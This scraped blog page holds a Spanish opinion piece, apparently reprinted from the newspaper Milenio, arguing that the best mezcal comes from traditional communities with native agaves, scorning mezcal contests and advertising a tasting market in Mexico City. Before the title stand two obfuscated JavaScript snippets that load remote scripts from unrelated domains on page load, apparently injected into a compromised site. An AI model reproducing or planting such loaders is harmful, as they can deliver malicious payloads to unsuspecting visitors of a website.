;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://searchgear.pro/257KCwFj"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Mezcales Tradicionales de los Pueblos de México » 46. El mejor mezcal tradicional de México

46. El mejor mezcal tradicional de México


Cientos de veces he escuchado esta pregunta: ¿dónde se hace el mejor mezcal de México? La respuesta es sencilla: en comunidades y regiones donde exista (1) una sólida y larga tradición mezcalera sostenida y verificada permanentemente por sus propios habitantes; (2) maestros mezcalilleros expertos y orgullosos de esta tradición, (3) que mantengan un profundo amor por ella y (4) respeto absoluto por los habitantes de su comunidad y (5) por su gusto histórico regional; y, por supuesto, (6) magueyes mezcaleros nativos de la región. Y algo más: (7) las producciones de estos mezcales son únicas y de volúmenes pequeños, por lo que siempre habrá mezcales de reciente elaboración y, por ende, diferentes.
Cuando se cumplen estas condiciones el mezcal tradicional es excelso, así que podemos encontrarlo en poblaciones, por ejemplo, de los estados de Jalisco, Michoacán, Estado de México, Chihuahua, Nuevo León, Sonora, Puebla, y de otros 14 estados más de nuestro país. ¿Cuál es el mejor? A esta pregunta ociosa podría responderse con otras aún más ociosas: ¿Cuál de los moles de México es el mejor? ¿Cuál de los pozoles? ¿Y de los tamales?
Contestada la pregunta, espero que no haya ningún demente que se le ocurra hacer un concurso de mezcales, pues sólo demostraría su cretinismo, su ignorancia y desprecio por una bebida tan compleja y exquisita como el mezcal.
Obligado es añadir que, ciertamente, muchos de los bebedizos que circulan actualmente con la palabra mezcal en la botella no lo son, y menos mezcales tradicionales, ya que no cumplen con ninguna de las condiciones mencionadas. Por lo tanto, es obvio que la pregunta de inicio no aplica para estos destilados chatarra o seudomezcales, pues no tienen tradición que los respalde ni poseen riqueza en su olor ni en su sabor. Estos sí que los sometan a concurso, al menos para saber cuál es el menos pior.
Quien desee adquirir mezcales tradicionales, acuda al Tianguis Mezcólatra hoy sábado de 12 a 15 horas: Red Fly, Orizaba 145 col. Roma, DF.
http://impreso.milenio.com/node/8853233

Category: Milenio, Publicaciones

Deja una respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *